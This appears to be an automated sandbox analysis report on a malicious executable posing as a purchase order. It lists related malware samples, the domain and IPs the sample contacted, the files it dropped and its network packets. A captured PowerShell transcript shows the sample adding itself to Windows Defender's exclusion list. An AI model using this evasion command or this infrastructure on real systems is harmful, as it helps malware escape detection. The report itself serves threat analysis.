              • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              coroloboxorozor.com0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
              • 172.67.172.17
              Payment_pdf.exeGet hashmaliciousBrowse
              • 172.67.172.17
              RG6ws8jWUJ.exeGet hashmaliciousBrowse
              • 172.67.172.17
              VIws8bzjD5.exeGet hashmaliciousBrowse
              • 104.21.71.230
              PURCHASE ITEMS.exeGet hashmaliciousBrowse
              • 172.67.172.17
              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
              • 172.67.172.17
              quotation_PR # 00459182..exeGet hashmaliciousBrowse
              • 104.21.71.230
              PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
              • 104.21.71.230
              PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
              • 172.67.172.17
              XP 6.xlsxGet hashmaliciousBrowse
              • 172.67.172.17
              PAYRECEIPT.exeGet hashmaliciousBrowse
              • 104.21.71.230
              New Order.exeGet hashmaliciousBrowse
              • 104.21.71.230
              PO#87498746510.exeGet hashmaliciousBrowse
              • 172.67.172.17
              TT.exeGet hashmaliciousBrowse
              • 172.67.172.17
              Payment_pdf.exeGet hashmaliciousBrowse
              • 172.67.172.17
              TT.exeGet hashmaliciousBrowse
              • 104.21.71.230
              purchase order 1.exeGet hashmaliciousBrowse
              • 104.21.71.230
              telex transfer.exeGet hashmaliciousBrowse
              • 104.21.71.230
              Invoices.exeGet hashmaliciousBrowse
              • 172.67.172.17
              ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
              • 104.21.71.230

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CLOUDFLARENETUS0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
              • 172.67.172.17
              Payment_pdf.exeGet hashmaliciousBrowse
              • 172.67.172.17
              8WjU4jrBIr.exeGet hashmaliciousBrowse
              • 104.23.98.190
              RG6ws8jWUJ.exeGet hashmaliciousBrowse
              • 172.67.172.17
              8TD8GfTtaW.exeGet hashmaliciousBrowse
              • 104.23.99.190
              lpdKSOB78u.exeGet hashmaliciousBrowse
              • 104.21.76.239
              VIws8bzjD5.exeGet hashmaliciousBrowse
              • 172.67.172.17
              PURCHASE ITEMS.exeGet hashmaliciousBrowse
              • 172.67.172.17
              Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
              • 172.67.188.154
              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
              • 172.67.172.17
              Halkbank_Ekstre_20210223_082357_541079.exeGet hashmaliciousBrowse
              • 172.67.188.154
              quotation_PR # 00459182..exeGet hashmaliciousBrowse
              • 172.67.172.17
              FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
              • 104.21.19.200
              PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
              • 172.67.188.154
              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
              • 172.67.160.246
              Yao Han Industries 61007-51333893QR001U,pdf.exeGet hashmaliciousBrowse
              • 172.67.188.154
              PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
              • 172.67.172.17
              ORDER LIST.xlsxGet hashmaliciousBrowse
              • 23.227.38.74
              (appproved)WJO-TT180,pdf.exeGet hashmaliciousBrowse
              • 104.21.19.200
              purchase order.exeGet hashmaliciousBrowse
              • 172.67.188.154

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_FHT3HKMJH1ZKMAUJ_63dc89b543dd5b8bd95060c21de7ec51b1eab522_890bc815_0a751f92\Report.wer
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):16530
              Entropy (8bit):3.7798130057613126
              Encrypted:false
              SSDEEP:192:+dadoJlUMmHBUZMXDWHaKsUAeZiN/u7sjS274It+3nC:XelWBUZMXSalmW/u7sjX4ItQC
              MD5:791FB84864502BB68F48D9ABD3AC9B61
              SHA1:DA3B6713E232E3C446CB574273B812ABD6921D9C
              SHA-256:E91401FE97BE9D71A60408604D553E105B0F97BC53079D25A9CCFA92C9C1F96C
              SHA-512:140EF3C1F5B3EA29E036F8629C8D059DF14DAD237F437119E184585DD71912E2C34A828BF05234FEDC9FA09623E0140BE97C0F796404FC6BCD6F6E5EF2C6E839
              Malicious:false
              Reputation:low
              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.7.5.4.2.6.5.5.7.5.4.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.7.5.4.2.9.2.6.0.6.6.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.8.f.5.e.1.4.-.b.f.4.6.-.4.e.5.9.-.9.c.0.7.-.e.5.c.c.b.0.c.9.1.f.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.7.8.a.b.f.a.-.1.e.b.7.-.4.4.5.0.-.8.a.c.a.-.2.a.7.3.5.8.2.9.c.e.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.u.r.c.h.a.s.e._.o.r.d.e.r._.3.9.7.4.8.4.6.5.8.4.6.4.9.7.4.9.4.5.6.4.8.4.4.7.5.6.4.8.4.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.f.8.-.0.0.0.1.-.0.0.1.7.-.b.1.d.c.-.3.e.7.0.0.a.0.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.7.a.0.d.9.0.a.d.9.1.e.8.8.3.2.b.6.d.0.b.e.f.b.f.2.7.5.b.1.a.0.0.0.0.0.9.0.4.!.0.0.0.0.9.6.8.d.4.d.6.0.0.d.d.0.0.5.7.9.f.6.5.9.4.e.3.b.1.e.f.f.9.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WER188E.tmp.WERInternalMetadata.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8508
              Entropy (8bit):3.708486672831689
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNizCEI636YS8SUtbgmfZ0SRCprh89bqSsfKOm:RrlsNi0636YpSUtbgmfmSnqRfa
              MD5:70E73B8C20BA78CAB9A68958DFD86DDB
              SHA1:C74C8B8EBCD2885C250B7D2001A478D736EBDCF6
              SHA-256:C7D24C15199B7EB4BDE1039E51C34B0003113156B800AC21EBC264DB70B2E5A5
              SHA-512:6C91DEC4019D136DCD3B6A1E7B5F358CD50B23D5630D707C0F2112098B35A55AE3DA7C5BEF60B678D7ED76C7CEDEDFE73DE49C24115ED725914500368FF8C619
              Malicious:false
              Reputation:low
              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.9.2.<./.P.i.d.>.......
              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1989.tmp.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4830
              Entropy (8bit):4.565106092606366
              Encrypted:false
              SSDEEP:48:cvIwSD8zs4JgtWI9NbVWSC8BC8fm8M4JwOFFrm+q8vprPU3B0HEd:uITf+2YSNdJwwmKBc3B0HEd
              MD5:C78494C46594307F2CF586AD4C1D92E6
              SHA1:EB7BBAA89FB1369B2D599D4D887C4D65CFE0DC5F
              SHA-256:B7AA4A14BBFAC93CF945AE533AB0018908878BF119EF183562CA64CEADE9368E
              SHA-512:11BC81442571591A8828C87D73192DAA6B7942FAEF20339850DF516CB2C62A362025C7F0A5F61BAB47BB196C20E060D798774FF230286A0903B6707119A5044F
              Malicious:false
              Reputation:low
              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874247" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC3.tmp.dmp
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 17:37:07 2021, 0x1205a4 type
              Category:dropped
              Size (bytes):318737
              Entropy (8bit):3.6212068729576066
              Encrypted:false
              SSDEEP:3072:5mo23tnT8aS0Yjd+pmhdaoMoM0yHUCgUIl9gIOgF55m2LmbCtN07RFEm:sPB20ppm7XMrTTjO9RpDXLMCI
              MD5:61F48E9B21B55CD023C2B3F28868A1DC
              SHA1:B958E2B05023E8C90164CF8064246D1BFD33B017
              SHA-256:CBC7A0246139ED4EA404D43EB9CFF4BB7A570CC34A6E957BB4A58B39913B02E7
              SHA-512:C5F58691CBA34BDD658CF9FFC6A9CA99879B9393E78619BE52E3290B16679CE651F4B20D55A8AFAD387C2A1025B73CA02F646502B077ED3CAEAA589A0A356C8E
              Malicious:false
              Reputation:low
              Preview: MDMP....... .......C=5`...................U...........B...... ,......GenuineIntelW...........T...........%=5`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):14734
              Entropy (8bit):4.993014478972177
              Encrypted:false
              SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
              MD5:8D5E194411E038C060288366D6766D3D
              SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
              SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
              SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):22184
              Entropy (8bit):5.604919130978974
              Encrypted:false
              SSDEEP:384:htCDLKQn49Oabr+eSBKn+ultIo3P7Q99g9SJUeRa1BMrm7ZSRV7Y8Fc64I+iGm:xd/4K+ultp3E89XehaAKa
              MD5:0FF05A4A465A41B20079D0A01C7514E8
              SHA1:5B4B33D86F729622CE54604CA902F5C058E65CFE
              SHA-256:79FBCE1E18636D44D5A784C53878A7951090F43878F1F1A3D5365A8B14F99DC2
              SHA-512:2953C5CECE9A4DDD0FA8647EBAC12627CF1BBF2536DDD17A8380D411F97406C56401CECB109A05EE7119D0CCAF3E6E13498C84097A1E1223355C88982D061D7E
              Malicious:false
              Reputation:low
              Preview: @...e...........c.........'...........h.8............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjibhhft.vtv.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zj10wm5e.0o0.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\Documents\20210223\PowerShell_transcript.648351.2_U4nhBu.20210223093657.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5925
              Entropy (8bit):5.421356566130499
              Encrypted:false
              SSDEEP:96:BZdhFNvqDo1ZxZohFNvqDo1ZZFTdjZ6hFNvqDo1ZcUtt1Zi:m
              MD5:9A199CC4BCB1CCEA57554AA3A9BC66E5
              SHA1:AE172DA3FB8F3020D8B54CC2522BBA7B4B0CEA20
              SHA-256:BF43D9594F6118484C13FEA3FC905A014486CDD14C1A7A07BD7394511A0B02BA
              SHA-512:25B30529537C94C9DFB88C636424E2C35F16B762A1AC89501A4B9560303B42ADF644C7CE0C2FD23ED3EC2CAF33ADF1AFBB8F4EA5CB3155B8B29A8009427F85BB
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210223093715..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe -Force..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210223093715..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe -Force..**********************..Windows PowerShell transcript start..Start time: 2021022309412

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):4.402866799132695
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Purchase_order_397484658464974945648447564845.exe
              File size:639488
              MD5:9d8635210670e8b332120a969dfa269e
              SHA1:968d4d600dd00579f6594e3b1eff98b46b422893
              SHA256:031e72b45d66c3365bfe3c7ace3c4c2a79facffa8daa7b483c77350a791c0133
              SHA512:1144be146d68cd958925df04a0933dd31347c3b41da3eb75cf486ce1d1982661e542e946eb3681e994687db21be987bd439a9e2c7beb65cf3be512976f469ed3
              SSDEEP:6144:2ATB+CjnoFug/a0qfvoC4eTzyOgW1MSpjCPzGcMrIVq/0qPmDbaT5lBWuDrRZAX:2qADSfbdTzcGVJVKq/Tm3iT0UrcX
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0......&........... ........@.. ....................... .......%....@................................

              File Icon

              Icon Hash:10d0c4ccccc4f000

              Static PE Info

              General

              Entrypoint:0x49b8ee
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
              TLS Callbacks:
              CLR (.Net) Version:v4.0.30319
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Authenticode Signature

              Signature Valid:
              Signature Issuer:
              Signature Validation Error:
              Error Number:
              Not Before, Not After
                Subject Chain
                  Version:
                  Thumbprint MD5:
                  Thumbprint SHA-1:
                  Thumbprint SHA-256:
                  Serial:

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b8a00x4b.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x2224.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x9a2000x1a28
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x998f40x99a00False0.35375400478data4.33662845536IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0x9c0000x22240x2400False0.856662326389data7.56673368954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xa00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x9c0e80x1d9dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                  RT_GROUP_ICON0x9de880x14data
                  RT_VERSION0x9de9c0x388dataEnglishUnited States

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  LegalCopyrightCopyright 2022 OionjRgH. All rights reserved.
                  Assembly Version4.3.3.8
                  InternalNameBPxnwGrR.exe
                  FileVersion0.2.2.0
                  CompanyNameAxOIZuyu
                  LegalTrademarksZMjlXTgt
                  CommentsOxipRjZc
                  ProductNameBPxnwGrR
                  ProductVersion4.3.3.8
                  FileDescriptionJMUBrPvp
                  OriginalFilenameBPxnwGrR.exe
                  Translation0x0409 0x0514

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 23, 2021 09:36:42.135297060 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.198645115 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.199220896 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.200351954 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.262064934 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408135891 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408164024 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408176899 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408193111 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408209085 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408225060 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408240080 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408242941 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.408256054 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408272982 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408284903 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.408288956 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.408313036 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.408504009 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.409522057 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.409549952 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.409610033 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.411025047 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.411051035 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.411942959 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.412453890 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.412482023 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.412822962 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.413923979 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.413949966 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.414257050 CET4971180192.168.2.3104.21.71.230
                  Feb 23, 2021 09:36:42.415360928 CET8049711104.21.71.230192.168.2.3
                  Feb 23, 2021 09:36:42.415391922 CET8049711104.21.71.230192.168.2.3
